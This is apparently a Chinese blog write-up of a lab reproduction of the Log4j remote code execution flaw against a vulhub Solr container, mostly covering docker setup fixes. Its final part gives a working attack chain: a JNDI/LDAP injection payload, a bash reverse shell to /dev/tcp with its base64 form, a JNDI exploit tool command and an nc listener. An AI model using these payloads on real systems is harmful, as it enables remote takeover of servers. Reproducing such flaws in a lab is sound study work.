LOG4介紹

是一個(gè)用Java編寫的可靠，快速和靈活的日志框架（API），它在Apache軟件許可下發(fā)布
log4j存在遠(yuǎn)程代碼執(zhí)行漏洞、受影響版本2.x

部署環(huán)境

攻擊機(jī)環(huán)境：192.168.3.180

kail環(huán)境：192.168.203.12【NAT轉(zhuǎn)換的】

部署vluhub

具體流程參考其他博主，本文主要講解在部署vluhub過(guò)程中存在的幾個(gè)問(wèn)題，作為記錄

問(wèn)題一、apt-get install docker docker-compose，執(zhí)行失敗，下載失敗，修改外網(wǎng)下載也失敗

獲取離線安裝包

直通車

Releases · docker/compose · GitHub

具體版本

下載后存儲(chǔ)至

賦予執(zhí)行權(quán)限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

問(wèn)題二、

wget https://github.com/vulhub/vulhub/archive/master.zip下載失敗?

手動(dòng)下載https://github.com/vulhub/vulhub/archive/master.zip

上傳解壓

unzip vulhub-master.zip

cd vulhub-master

問(wèn)題三、docker compose up -d執(zhí)行失敗

由于修改vluhub外網(wǎng)導(dǎo)致，需要切換成國(guó)內(nèi)網(wǎng)絡(luò)

修改內(nèi)容如下

重啟服務(wù)

再次執(zhí)行 docker compose up -d

端口8983搭建成功

地址訪問(wèn)

http://192.168.203.12:8983/solr/admin/cores?action=1

?驗(yàn)證是否存在漏洞

DNSLog Platform

?

替換發(fā)送請(qǐng)求

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}

?刷新dns右邊這個(gè)按鈕 出現(xiàn)下方內(nèi)容則存在

?bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64編碼

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

獲取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

?

執(zhí)行

?java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成獲取ldap內(nèi)容 有用

創(chuàng)建監(jiān)聽(tīng)nc-lvvp 6666異常由于windwos 沒(méi)有安裝nc需要安裝

直通車

?netcat 1.11 for Win32/Win64

安裝后火絨會(huì)報(bào)毒，運(yùn)行

然后在該路徑下執(zhí)行??nc-lvvp 6666

將生成ldap內(nèi)容復(fù)制替換，重新刷新一下接口

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}

?getshell了

大概就是這么個(gè)流程！

參考：

centos離線安裝docker,docker-compose_centos離線安裝docker-compose-CSDN博客

Log4j漏洞環(huán)境搭建以及復(fù)現(xiàn)拿getshell_dockerlog4j環(huán)境搭建-CSDN博客